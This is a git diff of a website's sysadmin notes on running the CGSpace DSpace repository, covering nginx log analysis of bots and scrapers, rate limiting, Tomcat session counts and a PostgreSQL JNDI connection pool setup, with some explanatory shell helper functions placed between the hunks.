      $ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
       HTTP/1.1 200 OK
       Connection: keep-alive
       Content-Encoding: gzip
      @@ -627,7 +627,7 @@ X-Cocoon-Version: 2.2.0
       X-Content-Type-Options: nosniff
       X-Frame-Options: SAMEORIGIN
       X-XSS-Protection: 1; mode=block
      -$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
      +$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
       HTTP/1.1 503 Service Temporarily Unavailable
       Connection: keep-alive
       Content-Length: 206
      @@ -642,9 +642,9 @@ Server: nginx
       
      • At the end of the day I checked the logs and it really looks like the Baidu rate limiting is working, HTTP 200 vs 503:
      -
      # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "13/Nov/2017" | grep "Baiduspider" | grep -c " 200 "
      +
      # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "13/Nov/2017" | grep "Baiduspider" | grep -c " 200 "
       1132
      -# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "13/Nov/2017" | grep "Baiduspider" | grep -c " 503 "
      +# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "13/Nov/2017" | grep "Baiduspider" | grep -c " 503 "
       10105
       
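One caveat with grepping for `" 200 "` is that it could also match a response size or another field that happens to be 200. A slightly stricter variant, sketched below, reads the status from its position in the combined log format instead. The function name `status_counts` is made up for this note, and the sketch assumes the default nginx combined format, where the status code is the first token after the quoted request line.

```shell
#!/usr/bin/env bash
# status_counts AGENT LOGFILE...
# Print "STATUS COUNT" pairs for requests whose log line contains AGENT.
# Hypothetical helper; assumes the nginx "combined" log format.
status_counts() {
    local agent="$1"
    shift
    # gzip -cdf passes plain files through and decompresses .gz ones
    gzip -cdf -- "$@" \
        | grep -F -- "$agent" \
        | awk -F'"' '{
              # Field 3 is the text between the request and the referrer,
              # e.g. " 200 5097 "; its first token is the status code
              split($3, f, " ")
              count[f[1]]++
          }
          END { for (s in count) print s, count[s] }' \
        | sort -n
}
```

Something like `status_counts Baiduspider /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz` would then list every status code at once. It does not filter by date, so an extra `grep "13/Nov/2017"` would still be needed to reproduce the numbers above exactly.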
      • Helping Sisay proof 47 records for IITA: https://dspacetest.cgiar.org/handle/10568/97029
      • @@ -695,7 +695,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
      • After a few minutes the connections went down to 44 and CGSpace was kinda back up, it seems like Tsega restarted Tomcat
      • Looking at the REST and XMLUI log files, I don’t see anything too crazy:
      -
      # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep "17/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
      +
      # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep "17/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
            13 66.249.66.223
            14 207.46.13.36
            17 207.46.13.137
      @@ -706,7 +706,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
          1400 70.32.83.92
          1503 50.116.102.77
          6037 45.5.184.196
      -# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "17/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
      +# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "17/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           325 139.162.247.24
           354 66.249.66.223
           422 207.46.13.36
      @@ -737,7 +737,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
       
    • Linode sent an alert that CGSpace was using a lot of CPU around 4–6 AM
    • Looking in the nginx access logs I see the most active XMLUI users between 4 and 6 AM:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "19/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "19/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         111 66.249.66.155
         171 5.9.6.51
         188 54.162.241.40
    @@ -751,7 +751,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
     
    • 66.249.66.153 appears to be Googlebot:
    -
    66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] "GET /handle/10568/2203 HTTP/1.1" 200 6309 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    +
    66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] "GET /handle/10568/2203 HTTP/1.1" 200 6309 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
     
    • We know Googlebot is persistent but behaves well, so I guess it was just a coincidence that it came at a time when we had other traffic and server activity
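Since I keep retyping the same "top client IPs" pipeline for these alerts, it could live in a small function. This is a rough sketch only: `top_ips` is a hypothetical name, and it assumes the client IP is the first whitespace-separated field of each nginx log line, as in the listings above.

```shell
#!/usr/bin/env bash
# top_ips PATTERN LOGFILE...
# Print the ten busiest client IPs (with request counts, ascending) among the
# log lines matching the extended regex PATTERN. Hypothetical helper.
top_ips() {
    local pattern="$1"
    shift
    # gzip -cdf passes plain files through and decompresses rotated .gz logs
    gzip -cdf -- "$@" \
        | grep -E -- "$pattern" \
        | awk '{ print $1 }' \
        | sort \
        | uniq -c \
        | sort -n \
        | tail -n 10
}
```

For example, `top_ips '19/Nov/2017:0[456]' /var/log/nginx/access.log /var/log/nginx/access.log.1` would repeat the 4 to 6 AM check. A plain `sort` before `uniq -c` is enough here because it only has to bring identical addresses together.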
    • In related news, I see an Atmire update process going for many hours and responsible for hundreds of thousands of log entries (two thirds of all log entries)
    • @@ -786,7 +786,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
    • Linode sent an alert that the CPU usage on the CGSpace server was very high around 4 to 6 AM
    • The logs don’t show anything particularly abnormal between those hours:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "22/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "22/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         136 31.6.77.23
         174 68.180.229.254
         217 66.249.66.91
    @@ -807,7 +807,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
     
  • Linode alerted again that CPU usage was high on CGSpace from 4:13 to 6:13 AM
  • I see a lot of Googlebot (66.249.66.90) in the XMLUI access logs
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "23/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "23/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
          88 66.249.66.91
         140 68.180.229.254
         155 54.196.2.131
    @@ -821,7 +821,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
     
    • … and the usual REST scrapers from CIAT (45.5.184.196) and CCAFS (70.32.83.92):
    -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "23/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "23/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           5 190.120.6.219
           6 104.198.9.108
          14 104.196.152.243
    @@ -836,7 +836,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
     
  • These IPs crawling the REST API don’t specify user agents and I’d assume they are creating many Tomcat sessions
  • I would catch them in nginx to assign a “bot” user agent to them so that the Tomcat Crawler Session Manager valve could deal with them, but they don’t seem to create any really, at least not in the dspace.log:
  • -
    $ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     2
     
    • I’m wondering if REST works differently, or just doesn’t log these sessions?
    • @@ -861,7 +861,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
    • In just a few seconds I already see a dozen requests from Googlebot (of course they get HTTP 301 redirects to cgspace.cgiar.org)
    • I also noticed that CGNET appears to be monitoring the old domain every few minutes:
    -
    192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] "HEAD / HTTP/1.1" 301 0 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
    +
    192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] "HEAD / HTTP/1.1" 301 0 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
     
    • I should probably tell CGIAR people to have CGNET stop that
    @@ -870,7 +870,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
  • Linode alerted that CGSpace server was using too much CPU from 5:18 to 7:18 AM
  • Yet another mystery because the load for all domains looks fine at that time:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "26/Nov/2017:0[567]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "26/Nov/2017:0[567]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         190 66.249.66.83
         195 104.196.152.243
         220 40.77.167.82
    @@ -887,7 +887,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
     
  • About an hour later Uptime Robot said that the server was down
  • Here are all the top XMLUI and REST users from today:
  • -
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "29/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "29/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         540 66.249.66.83
         659 40.77.167.36
         663 157.55.39.214
    @@ -905,14 +905,14 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
     
  • I don’t see much activity in the logs but there are 87 PostgreSQL connections
  • But shit, there were 10,000 unique Tomcat sessions today:
  • -
    $ cat dspace.log.2017-11-29 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ cat dspace.log.2017-11-29 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     10037
     
    • Although maybe that’s not much, as the previous two days had more:
    -
    $ cat dspace.log.2017-11-27 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ cat dspace.log.2017-11-27 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     12377
    -$ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +$ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     16984
     
    • I think we just need to start increasing the number of allowed PostgreSQL connections instead of fighting this, as it’s the most common source of crashes we have
    • diff --git a/docs/2017-12/index.html b/docs/2017-12/index.html index 7a6f097bd..6f08d9fa7 100644 --- a/docs/2017-12/index.html +++ b/docs/2017-12/index.html @@ -30,7 +30,7 @@ The logs say “Timeout waiting for idle object” PostgreSQL activity says there are 115 connections currently The list of connections to XMLUI and REST API for today: "/> - + @@ -123,7 +123,7 @@ The list of connections to XMLUI and REST API for today:
    • PostgreSQL activity says there are 115 connections currently
    • The list of connections to XMLUI and REST API for today:
    -
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         763 2.86.122.76
         907 207.46.13.94
        1018 157.55.39.206
    @@ -137,12 +137,12 @@ The list of connections to XMLUI and REST API for today:
     
    • The number of DSpace sessions isn’t even that high:
    -
    $ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     5815
     
    • Connections in the last two hours:
    -
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017:(09|10)" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail                                                      
    +
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017:(09|10)" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail                                                      
          78 93.160.60.22
         101 40.77.167.122
         113 66.249.66.70
    @@ -157,18 +157,18 @@ The list of connections to XMLUI and REST API for today:
     
  • What the fuck is going on?
  • I’ve never seen this 2.86.122.76 before, it has made quite a few unique Tomcat sessions today:
  • -
    $ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     822
     
    • Appears to be some new bot:
    -
    2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] "GET /handle/10568/78444?show=full HTTP/1.1" 200 29307 "-" "Mozilla/3.0 (compatible; Indy Library)"
    +
    2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] "GET /handle/10568/78444?show=full HTTP/1.1" 200 29307 "-" "Mozilla/3.0 (compatible; Indy Library)"
     
    • I restarted Tomcat and everything came back up
    • I can add Indy Library to the Tomcat crawler session manager valve but it would be nice if I could simply remap the useragent in nginx
    • I will also add ‘Drupal’ to the Tomcat crawler session manager valve because there are Drupals out there harvesting and they should be considered as bots
    -
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017" | grep Drupal | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017" | grep Drupal | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           3 54.75.205.145
           6 70.32.83.92
          14 2a01:7e00::f03c:91ff:fe18:7396
    @@ -206,7 +206,7 @@ The list of connections to XMLUI and REST API for today:
     
  • I don’t see any errors in the DSpace logs but I see in nginx’s access.log that UptimeRobot was returned an HTTP 499 status (Client Closed Request)
  • Looking at the REST API logs I see some new client IP I haven’t noticed before:
  • -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "6/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "6/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
          18 95.108.181.88
          19 68.180.229.254
          30 207.46.13.151
    @@ -228,7 +228,7 @@ The list of connections to XMLUI and REST API for today:
     
  • I looked just now and see that there are 121 PostgreSQL connections!
  • The top users right now are:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "7/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail 
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "7/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail 
         838 40.77.167.11
         939 66.249.66.223
        1149 66.249.66.206
    @@ -247,7 +247,7 @@ The list of connections to XMLUI and REST API for today:
     
    • It is responsible for 4,500 Tomcat sessions today alone:
    -
    $ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     4574
     
    • I’ve adjusted the nginx IP mapping that I set up last month to account for 124.17.34.60 and 124.17.34.59 using a regex, as it’s the same bot on the same subnet
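The nginx mapping itself is not reproduced in these notes, so the following is only a sketch of the kind of pattern I mean, checked in the shell before it goes anywhere near the nginx config. The regex and the function name `is_known_bot_ip` are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# is_known_bot_ip IP
# Succeed (exit 0) if IP is 124.17.34.59 or 124.17.34.60, fail otherwise.
# Hypothetical helper; the regex is an assumed example, not the deployed one.
is_known_bot_ip() {
    # Dots are escaped and the pattern is anchored so that addresses such as
    # 124.17.34.6 or 124.17.34.600 do not match by accident
    printf '%s\n' "$1" | grep -q -E '^124\.17\.34\.(59|60)$'
}
```

Running `is_known_bot_ip 124.17.34.60 && echo bot` is a quick way to confirm that the pattern covers both addresses without catching their neighbours.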
    • @@ -255,8 +255,8 @@ The list of connections to XMLUI and REST API for today:
    $ /home/cgspace.cgiar.org/bin/dspace cleanup -v
     ...
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(144666) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(144666) is still referenced from table "bundle".
     
    • The solution is like I discovered in 2017-04, to set the primary_bitstream_id to null:
    @@ -294,12 +294,12 @@ UPDATE 1
  • I did a test import of the data locally after building with SAFBuilder but for some reason I had to specify the collection (even though the collections were specified in the collection field)
  • -
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &> /tmp/ccafs.log
    +
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &> /tmp/ccafs.log
     
    • It’s the same on DSpace Test, I can’t import the SAF bundle without specifying the collection:
    $ dspace import --add --eperson=aorth@mjanja.ch --mapfile=/tmp/ccafs.map --source=/tmp/ccafs-2016/SimpleArchiveFormat
    -No collections given. Assuming 'collections' file inside item directory
    +No collections given. Assuming 'collections' file inside item directory
     Adding items from directory: /tmp/ccafs-2016/SimpleArchiveFormat
     Generating mapfile: /tmp/ccafs.map
     Processing collections file: collections
    @@ -328,7 +328,7 @@ Elapsed time: 2 secs (2559 msecs)
     
  • Linode alerted that CGSpace was using high CPU from 4 to 6 PM
  • The logs for today show the CORE bot (137.108.70.7) being active in XMLUI:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "17/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "17/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         671 66.249.66.70
         885 95.108.181.88
         904 157.55.39.96
    @@ -342,7 +342,7 @@ Elapsed time: 2 secs (2559 msecs)
     
    • And then some CIAT bot (45.5.184.196) is actively hitting API endpoints:
    -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "17/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "17/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
          33 68.180.229.254
          48 157.55.39.96
          51 157.55.39.179
    @@ -371,7 +371,7 @@ Elapsed time: 2 secs (2559 msecs)
     
  • Linode alerted this morning that there was high outbound traffic from 6 to 8 AM
  • The XMLUI logs show that the CORE bot from last night (137.108.70.7) is very active still:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         190 207.46.13.146
         191 197.210.168.174
         202 86.101.203.216
    @@ -385,7 +385,7 @@ Elapsed time: 2 secs (2559 msecs)
     
    • On the API side (REST and OAI) there is still the same CIAT bot (45.5.184.196) from last night making quite a number of requests this morning:
    -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           7 104.198.9.108
           8 185.29.8.111
           8 40.77.167.176
    @@ -402,7 +402,7 @@ Elapsed time: 2 secs (2559 msecs)
     
  • Linode alerted that CGSpace was using 396.3% CPU from 12 to 2 PM
  • The REST and OAI API logs look pretty much the same as earlier this morning, but there’s a new IP harvesting XMLUI:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail            
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail            
         360 95.108.181.88
         477 66.249.66.90
         526 86.101.203.216
    @@ -420,13 +420,13 @@ Elapsed time: 2 secs (2559 msecs)
     
    • Surprisingly it seems they are re-using their Tomcat session for all those 17,000 requests:
    -
    $ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l                                                                                          
    +
    $ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l                                                                                          
     1
     
    • I guess there’s nothing I can do to them for now
    • In other news, I am curious how many PostgreSQL connection pool errors we’ve had in the last month:
    -
    $ grep -c "Cannot get a connection, pool error Timeout waiting for idle object" dspace.log.2017-1* | grep -v :0
    +
    $ grep -c "Cannot get a connection, pool error Timeout waiting for idle object" dspace.log.2017-1* | grep -v :0
     dspace.log.2017-11-07:15695
     dspace.log.2017-11-08:135
     dspace.log.2017-11-17:1298
    @@ -476,7 +476,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
     
  • I re-deployed the 5_x-prod branch on CGSpace, applied all system updates, and restarted the server
  • Looking through the dspace.log I see this error:
  • -
    2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
    +
    2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
     
    • I don’t have time now to look into this but the Solr sharding has long been an issue!
    • Looking into using JDBC / JNDI to provide a database pool to DSpace
    • @@ -484,23 +484,23 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
    • First, I uncomment db.jndi in dspace/config/dspace.cfg
    • Then I create a global Resource in the main Tomcat server.xml (inside GlobalNamingResources):
    -
    <Resource name="jdbc/dspace" auth="Container" type="javax.sql.DataSource"
    -	  driverClassName="org.postgresql.Driver"
    -	  url="jdbc:postgresql://localhost:5432/dspace"
    -	  username="dspace"
    -	  password="dspace"
    -      initialSize='5'
    -      maxActive='50'
    -      maxIdle='15'
    -      minIdle='5'
    -      maxWait='5000'
    -      validationQuery='SELECT 1'
    -      testOnBorrow='true' />
    +
    <Resource name="jdbc/dspace" auth="Container" type="javax.sql.DataSource"
    +	  driverClassName="org.postgresql.Driver"
    +	  url="jdbc:postgresql://localhost:5432/dspace"
    +	  username="dspace"
    +	  password="dspace"
    +      initialSize='5'
    +      maxActive='50'
    +      maxIdle='15'
    +      minIdle='5'
    +      maxWait='5000'
    +      validationQuery='SELECT 1'
    +      testOnBorrow='true' />
     
    -
    <ResourceLink global="jdbc/dspace" name="jdbc/dspace" type="javax.sql.DataSource"/>
    +
    <ResourceLink global="jdbc/dspace" name="jdbc/dspace" type="javax.sql.DataSource"/>
     
    • I am not sure why several guides show configuration snippets for server.xml and web application contexts that use a Local and Global jdbc…
    • When DSpace can’t find the JNDI context (for whatever reason) you will see this in the dspace logs:
    • @@ -535,11 +535,11 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
    • And indeed the Catalina logs show that it failed to set up the JDBC driver:
    -
    org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class 'org.postgresql.Driver'
    +
    org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class 'org.postgresql.Driver'
     
    • There are several copies of the PostgreSQL driver installed by DSpace:
    -
    $ find ~/dspace/ -iname "postgresql*jdbc*.jar"
    +
    $ find ~/dspace/ -iname "postgresql*jdbc*.jar"
     /Users/aorth/dspace/webapps/jspui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
     /Users/aorth/dspace/webapps/oai/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
     /Users/aorth/dspace/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
    @@ -561,8 +561,8 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
     
  • Oh that’s fantastic, now at least Tomcat doesn’t print an error during startup so I guess it succeeds in creating the JNDI pool
  • DSpace starts up but I have no idea if it’s using the JNDI configuration because I see this in the logs:
  • -
    2017-12-19 13:26:54,271 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS is '{}'PostgreSQL
    -2017-12-19 13:26:54,277 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is '{}'9.5.10
    +
    2017-12-19 13:26:54,271 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS is '{}'PostgreSQL
    +2017-12-19 13:26:54,277 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is '{}'9.5.10
     2017-12-19 13:26:54,293 INFO  org.dspace.storage.rdbms.DatabaseUtils @ Loading Flyway DB migrations from: filesystem:/Users/aorth/dspace/etc/postgres, classpath:org.dspace.storage.rdbms.sqlmigration.postgres, classpath:org.dspace.storage.rdbms.migration
     2017-12-19 13:26:54,306 INFO  org.flywaydb.core.internal.dbsupport.DbSupportFactory @ Database: jdbc:postgresql://localhost:5432/dspacetest (PostgreSQL 9.5)
     
      @@ -669,7 +669,7 @@ javax.naming.NoInitialContextException: Need to specify class name in environmen
    • There are short bursts of connections up to 10, but it generally stays around 5
    • Test and import 13 records to CGSpace for Abenet:
    -
